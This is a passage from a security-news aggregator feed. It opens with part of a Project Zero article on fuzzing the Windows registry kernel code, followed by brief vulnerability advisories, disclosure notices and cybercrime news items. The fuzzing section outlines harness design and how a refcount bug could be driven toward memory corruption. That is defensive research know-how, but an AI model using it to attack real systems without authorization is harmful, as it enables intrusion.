through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations. As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it. One can only dream... 🙂 Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.Harness While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.Support the registry virtualization mechanism, which can consist of several components:Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,Creating an additional key structure under the HKU\_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce. The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.Bug detection Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions. The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it. Here are a few ideas for addressing the problem, some more realistic than others:If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data. Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.Conclusion This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!

https://googleprojectzero.blogspot.com/2025/05/the-windows-registry-adventure-7-attack-surface.html
Three vulnerabilities in MegaBIP software
2025-05-23T09:00:00Z | 1747990800

CERT Polska has received a report about 3 vulnerabilities (from CVE-2025-3893 to CVE-2025-3895) found in MegaBIP software.

https://cert.pl/en/posts/2025/05/CVE-2025-3893/
The Week in Vulnerabilities: Firefox, Roundcube and ICS Flaws Flagged by Cyble
2025-05-23T08:59:53Z | 1747990793

Cyble vulnerability intelligence researchers investigated nearly 100 IT and industrial control system (ICS) vulnerabilities this week and flagged eight as meriting high-priority attention by security teams – including two targeted by Russian threat actors. In all, Cyble investigated 21 IT vulnerabilities this week, 68 ICS vulnerabilities, and eight vulnerabilities under discussion by threat actors on dark web forums. The U.S. Cybersecurity and Infrastructure Security Agency added eight vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog last week, including the Ivanti Endpoint Manager Mobile (EPMM) and SAP NetWeaver vulnerabilities addressed in last week’s Cyble vulnerability blog. IT Vulnerabilities Here are four IT vulnerabilities highlighted by Cyble this week – and an additional six under discussion by threat actors on dark web forums. The Mozilla Foundation patched two Firefox vulnerabilities discovered by researchers during the Pwn2Own Berlin 2025 contest. Firefox 138.0.4 fixes the critical vulnerabilities. CVE-2025-4918 is an out-of-bounds memory access vulnerability in Firefox. The flaw occurs when resolving JavaScript Promise objects, allowing an attacker to perform unauthorized out-of-bounds read or write in memory. CVE-2025-4919 is another critical out-of-bounds access vulnerability in Mozilla Firefox. This flaw arises during optimizing linear sums in JavaScript, specifically due to array index miscalculations. An attacker could potentially exploit this bug to perform out-of-bound reading or writing, leading to memory corruption, potential code execution, or unauthorized access to sensitive data. CVE-2023-43770 and CVE-2020-35730 are cross-site scripting (XSS) vulnerabilities in Roundcube Webmail, an open-source, browser-based email client. The flaws could allow attackers to inject malicious JavaScript via specially crafted links in plain text email messages, exploiting improper input neutralization in the rcube_string_replacer.php component. Researchers recently revealed that the vulnerabilities have been actively exploited in the wild, notably by the Russian state-sponsored threat group APT28 (also known as Fancy Bear) in spearphishing and espionage campaigns targeting public sector organizations and critical infrastructure in Europe, Cameroon, and Ecuador. Among vulnerabilities under discussion on dark web forums, flaws in SysAid On-Premises (CVE-2025-2775 and CVE-2025-2776) and GNU Screen (CVE-2025-46802, CVE-2025-46803, CVE-2025-46804, and CVE-2025-46805) figured prominently in threat actor discussions of potential exploits. Also this week, Cyble honeypot sensors detected attack attempts on CVE-2025-3248, a 9.8-severity Missing Authentication for Critical Function vulnerability in versions of the Langflow low-code AI builder before 1.3.0. ICS Vulnerabilities Of the 68 ICS vulnerabilities evaluated by Cyble researchers this week, four stood out as meriting high-priority attention by security teams. CVE-2025-4364 is an Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability affecting Assured Telematics Inc.'s Fleet Management System. If successfully exploited, this vulnerability could allow an attacker to collect sensitive file system details or gain access to administrative credentials, posing a serious threat to operational security. CVE-2025-46412 (Authentication Bypass) and CVE-2025-41426 (Stack-based Buffer Overflow) are vulnerabilities affecting Vertiv's Liebert RDU101 and IS-UNITY modules, which are widely used for remote monitoring and integration of critical infrastructure like UPS and cooling systems in data centers, energy, and communication sectors. These modules enable communication with SCADA, DCS, and BMS systems, making them high-value targets. Successful exploitation could allow unauthorized access or remote code execution, posing serious operational and security risks. Immediate mitigation is essential to protect critical infrastructure. CVE-2025-41450 is an Improper Authentication vulnerability in Danfoss AK-SM 8xxA Series (versions prior to R4.2), which are widely used in commercial facility control systems such as SCADA, DCS, and BMS. The flaw could allow unauthorized users to bypass login mechanisms and gain access to sensitive system functions. Given the role of these systems in managing key infrastructure like refrigeration and building automation, the vulnerability poses a significant operational risk. Conclusion The high number of vulnerabilities this week underscores the constant threats facing IT and ICS environments. Studies have shown that organizations only patch around 15% of vulnerabilities on average, making a risk-based vulnerability management program critically crucial for all organizations. Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets, removing or protecting web-facing assets, Zero-Trust access principles, ransomware-resistant backups, hardened endpoints, infrastructure, and configurations, network, endpoint, and cloud monitoring, and well-rehearsed incident response plans. Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today. The post The Week in Vulnerabilities: Firefox, Roundcube and ICS Flaws Flagged by Cyble appeared first on Cyble.

https://cyble.com/blog/critical-it-vulnerabilities-flagged-in-cyble-report/
Allvarlig sårbarhet i BIND
2025-05-23T08:54:00Z | 1747990440

En allvarlig sårbarhet har upptäckts i BIND (CVE-2025-40775), med CVSS-klassificering 7.5. [1] Genom att skicka DNS-data med en speciellt utformad TSIG (Transaction Signature) kan servern göras otillgänglig. [2] Detta kan vidare påverka tjänster så som e-post, autentisering, fjärråtkomst och annat som är beroende av DNS.

https://www.cert.se/2025/05/allvarlig-sarbarhet-i-bind.html
Chinese Hackers exploit Trimble Cityworks flaw to infiltrate U.S. Local Government Systems
2025-05-23T08:47:33Z | 1747990053

A Chinese state-linked threat group, identified as UAT-6382, has exploited a previously patched vulnerability in Trimble Cityworks software to compromise local government networks in the United States, according to a report by Cisco Talos. The flaw, tracked as CVE-2025-0994 and carrying a CVSS v4 score of 8.6, is a deserialization vulnerability that can be exploited for remote code execution. Despite being patched, the vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities catalog in February 2025. Since January, UAT-6382 has been leveraging this flaw to breach municipal systems, deploying Chinese-language web shells and custom […] The post Chinese Hackers exploit Trimble Cityworks flaw to infiltrate U.S. Local Government Systems first appeared on Cybersafe News.

https://cybersafe.news/chinese-hackers-exploit-trimble-cityworks-flaw-to-infiltrate-u-s-local-government-systems/
Shine a spotlight on your open source project
2025-05-23T08:30:00Z | 1747989000

Celebrate #MaintainerMonth with two big opportunities to showcase your open source project at GitHub Universe and WeAreDevelopers World Congress. Applications are open. Don’t miss out! The post Shine a spotlight on your open source project appeared first on The GitHub Blog.

https://github.blog/open-source/shine-a-spotlight-on-your-open-source-project/
U.S. Dismantles DanaBot Malware Network in major Global cybercrime bust
2025-05-23T08:10:49Z | 1747987849

The U.S. Department of Justice (DoJ) announced the takedown of the DanaBot malware infrastructure and unsealed indictments against 16 individuals accused of fueling a global malware-as-a-service (MaaS) operation that caused over $50 million in damages. The sophisticated cyber scheme, allegedly operated by a Russia-based group, infected more than 300,000 devices worldwide. Aleksandr Stepanov, 39, and Artem Kalinkin, 34, both from Novosibirsk, Russia, were charged who remain at large. Stepanov faces multiple counts, including conspiracy, wire fraud, aggravated identity theft, and unauthorized computer access. Kalinkin is charged with conspiracy to commit computer fraud and unauthorized system impairment. Court documents reveal that […] The post U.S. Dismantles DanaBot Malware Network in major Global cybercrime bust first appeared on Cybersafe News.

https://cybersafe.news/u-s-dismantles-danabot-malware-network-in-major-global-cybercrime-bust/
ZDI-CAN-27274: Apple
2025-05-23T05:00:00Z | 1747976400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27176: VMware
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Corentin "@OnlyTheDuck" BAYET from REverse Tactics' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27256: Microsoft
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Do Manh Dung & Nguyen Dang Nguyen of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27175: VMware
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Thomas Bouzerar (@MajorTomSec) from @Synacktiv, Etienne Helluy-Lafont from @Synacktiv' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26883: AzeoTech
2025-05-23T05:00:00Z | 1747976400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26654: Oracle
2025-05-23T05:00:00Z | 1747976400

A CVSS score 6.0 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Viettel Cyber Security' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27158: Microsoft
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Chen Le Qi of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27235: Microsoft
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Chen Le Qi of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26653: Oracle
2025-05-23T05:00:00Z | 1747976400

A CVSS score 6.0 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Viettel Cyber Security' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27188: Microsoft
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.8 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Hyeonjin Choi (@d4m0n_8) of Out Of Bounds' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27264: Apple
2025-05-23T05:00:00Z | 1747976400

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Hossein Lotfi (@hosselot) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-23, 14 days ago. The vendor is given until 2025-09-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
OpenSSL Security Restriction Bypass Vulnerability
2025-05-23T01:00:00Z | 1747962000

A vulnerability was identified in OpenSSL. A remote attacker could exploit this vulnerability to trigger security restriction bypass. Impact Security Restriction Bypass System / Technologies affected OpenSSL version 3.5 Solutions Before installation of the software, please visit the software manufacturer web-site for more details.   For version 3.5, upgrade to version 3.5.1

https://www.hkcert.org/security-bulletin/openssl-security-restriction-bypass-vulnerability_20250523
ModSecurity Denial of Service Vulnerability
2025-05-23T01:00:00Z | 1747962000

A vulnerability was identified in ModSecurity. A remote attacker could exploit this vulnerability to trigger denial of service condition on the targeted system. Impact Denial of Service System / Technologies affected ModSecurity version 2.9.8 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-859r-vvv8-rm8r

https://www.hkcert.org/security-bulletin/modsecurity-denial-of-service-vulnerability_20250523
Cisco Products Multiple Vulnerabilities
2025-05-23T01:00:00Z | 1747962000

Multiple vulnerabilities were identified in Cisco products. A remote attacker could exploit some of these vulnerabilities to trigger cross-site scripting and data manipulation on the targeted system. Impact Data Manipulation Cross-Site Scripting System / Technologies affected Cisco Webex Cisco Webex Meetings Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cache-Q4xbkQBG https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-xss-7teQtFn8

https://www.hkcert.org/security-bulletin/cisco-products-multiple-vulnerabilities_20250523
Real-Time Threat Intelligence: How Speed and Context Defeat Cyberthreats
2025-05-23T01:00:00Z | 1747962000

Real-time threat intelligence refers to the continuous process of collecting, analyzing, and disseminating data about active or emerging cyberthreats.

https://www.opswat.com/blog/real-time-threat-intelligence
Langflow: CVE-2025-3248: Active Exploitation
2025-05-23T00:00:00Z | 1747958400

Learn about CVE-2025-3248 affecting Langflow. Patch now to prevent remote code execution.

https://www.recordedfuture.com/blog/langflow-cve-2025-3248
Multiples vulnérabilités dans Tenable Nessus Network Monitor (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans Tenable Nessus Network Monitor. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0448/
Multiples vulnérabilités dans Asterisk (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans Asterisk. Elles permettent à un attaquant de provoquer un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0446/
Multiples vulnérabilités dans Grafana (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans Grafana. Elles permettent à un attaquant de provoquer une atteinte à l'intégrité des données et une injection de code indirecte à distance (XSS).

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0447/
Multiples vulnérabilités dans Mozilla Thunderbird (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans Mozilla Thunderbird. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0445/
Multiples vulnérabilités dans le noyau Linux de Red Hat (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0450/
Multiples vulnérabilités dans les produits IBM (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0452/
Vulnérabilité dans Microsoft Edge (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

Une vulnérabilité a été découverte dans Microsoft Edge. Elle permet à un attaquant de provoquer une élévation de privilèges.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0451/
Multiples vulnérabilités dans le noyau Linux de SUSE (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une atteinte à l'intégrité des données et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0449/
Opération ENDGAME 2025 (23 mai 2025)
2025-05-23T00:00:00Z | 1747958400

Entre le 19 et le 23 mai 2025, de nouvelles actions de démantèlement ont été menées contre plusieurs infrastructures liées à des codes cybercriminels. Ces actions ont été réalisées dans le cadre de l’opération de coopération judiciaire internationale ENDGAME lancée en...

https://www.cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-008/
Competição Cybersecurity Challenge.PT arranca hoje
2025-05-23T00:00:00Z | 1747958400

Estão abertas as inscrições na plataforma de treino do Cybersecurity Challenge PT. Esta é uma iniciativa destinada a jovens estudantes entre os 16 e os 25 anos e que tem como objetivo selecionar 10 jovens talentos em Cibersegurança, que vão representar Portugal no European Cybersecurity Challenge que decorre, na Polónia. Ao longo das próximas semanas vão sendo lançados, na plataforma de treino, desafios de vários níveis de dificuldade que fazem parte da qualificação para esta competição. A prova de pré-qualificação da Team Portugal, com uma competição de Capture the Flag (CTF), terá lugar no dia 7 de junho, das 9h00 às 19h00. O Cybersecurity Challenge PT resulta de uma cooperação entre o Centro Nacional de Cibersegurança (CNCS), o Instituto Superior Técnico, a Universidade do Porto e a AP2SI - Associação Portuguesa para a Promoção da Segurança da Informação. Esta iniciativa é apoiada pelo Centro Internet Segura (CIS). Inserido no eixo Educação do programa INCoDe.2030 e no plano de ação da Estratégia Nacional de Segurança do Ciberespaço, o Cybersecurity Challenge PT, conta, todos os anos, com centenas de participantes. Esta atividade promove competências nas várias áreas da segurança informática, permitindo o desenvolvimento de processos de colaboração e trabalho em equipa e um crescimento individual dos participantes através da resolução de desafios complexos. Saber mais em https://cybersecuritychallenge.pt/

https://dyn.cncs.gov.pt/pt/detalhe/art/135932/competicao-cybersecurity-challengept-arranca-hoje
De-obfuscating ALCATRAZ
2025-05-23T00:00:00Z | 1747958400

An exploration of techniques used by the obfuscator ALCATRAZ.

https://www.elastic.co/security-labs/deobfuscating-alcatraz
MetaDefender Sandbox 2.3.0: AI-Powered Reverse Engineering, Smarter Threat Detection, and Broader Malware Coverage
2025-05-23T00:00:00Z | 1747958400

With the release of MetaDefender Sandbox 2.3.0, OPSWAT delivers key advancements in AI-driven malware analysis, reverse engineering workflows, and behavior-based threat detection to meet these demands head-on.

https://www.opswat.com/blog/metadefender-sandbox-2-3-0-ai-powered-reverse-engineering-smarter-threat-detection-and-broader-malware-coverage
Oops: DanaBot Malware Devs Infected Their Own PCs
2025-05-22T21:53:21Z | 1747950801

The U.S. government today unsealed criminal charges against 16 individuals accused of operating and selling DanaBot, a prolific strain of information-stealing malware that has been sold on Russian cybercrime forums since 2018. The FBI says a newer version of DanaBot was used for espionage, and that many of the defendants exposed their real-life identities after accidentally infecting their own systems with the malware.

https://krebsonsecurity.com/2025/05/oops-danabot-malware-devs-infected-their-own-pcs/
Operation Endgame: Global Law Enforcement Takes Down DanaBot Malware Scheme
2025-05-22T20:54:06Z | 1747947246

Flashpoint is proud to have supported this investigation as part of an alliance of government agencies and private sector partners. The post Operation Endgame: Global Law Enforcement Takes Down DanaBot Malware Scheme appeared first on Flashpoint.

https://flashpoint.io/blog/operation-endgame-danabot-malware/
Intelligence Insights: May 2025
2025-05-22T20:16:11Z | 1747944971

Amber Albatross continues its reign and Latrodectus crawls into the top 10 in this month's edition of Intelligence Insights

https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
Danabot: Analyzing a fallen empire
2025-05-22T20:03:14Z | 1747944194

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/
Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyberattacks, and Spying
2025-05-22T19:56:44Z | 1747943804

A new US indictment against a group of Russian nationals offers a clear example of how, authorities say, a single malware operation can enable both criminal and state-sponsored hacking.

https://www.wired.com/story/us-charges-16-russians-danabot-malware/
Why Utilities Need Both: The Hybrid Agent/Agentless Approach to Segmenting Modern Electric Grid Infrastructure
2025-05-22T19:53:23Z | 1747943603

In the world of cybersecurity, passionate debates often emerge about the "right" approach to microsegment critical systems. For years, vendors have staked claims on either agent-based or agentless segmentation, advocating their chosen method as the superior solution. But what if the reality - especially for complex environments like electric utilities - requires a more nuanced perspective?

https://www.zentera.net/blog/agent-agentless-approach-utilities
[Control systems] ABB security advisory (AV25-290)
2025-05-22T19:31:57Z | 1747942317

https://cyber.gc.ca/en/alerts-advisories/control-systems-abb-security-advisory-av25-290
Destructive malware available in NPM repo went unnoticed for 2 years
2025-05-22T19:15:27Z | 1747941327

Payloads were set to spontaneously detonate on specific dates with no warning.

https://arstechnica.com/information-technology/2025/05/destructive-malware-available-in-npm-repo-went-unnoticed-for-2-years/
AI in Cybersecurity: How AI Is Impacting the Fight Against Cybercrime
2025-05-22T19:00:00Z | 1747940400

AI is transforming cybersecurity. Explore how hackers use AI for cybercrimes and how cybersecurity experts use AI to prevent, detect, and respond to attacks.

https://www.akamai.com/blog/security/2025/may/ai-cybersecurity-how-impacting-fight-against-cybercrime
Data Exfiltration Explained: Techniques, Risks, and Defenses
2025-05-22T18:53:08Z | 1747939988

Unlike accidental data leaks caused by human error or misconfigured systems, data exfiltration is a deliberate and malicious act. It involves the unauthorized transfer of sensitive data from within a secured environment to an external destination controlled by threat actors. This form of cybercrime is not only growing in sophistication but also in frequency, driven by motivations ranging from financial gain to geopolitical agendas.  What Is... Read more » The post Data Exfiltration Explained: Techniques, Risks, and Defenses appeared first on Plixer.

https://www.plixer.com/blog/data-exfiltration-explained/
2430 inimest osales mobiiliga hääletamise avalikus testimises
2025-05-22T18:24:53Z | 1747938293

Täna, 22. mail kell 20.00, lõppes mobiiltelefonidele loodud e-hääletamise rakenduse prototüübi avalik testimine. Testimise eesmärk oli koguda kasutajatelt tagasisidet rakenduse töökindluse, kasutusmugavuse ning häälte kogumisteenuse toimimise kohta.

https://ria.ee/uudised/2430-inimest-osales-mobiiliga-haaletamise-avalikus-testimises
Ghosted by a cybercriminal
2025-05-22T18:00:30Z | 1747936830

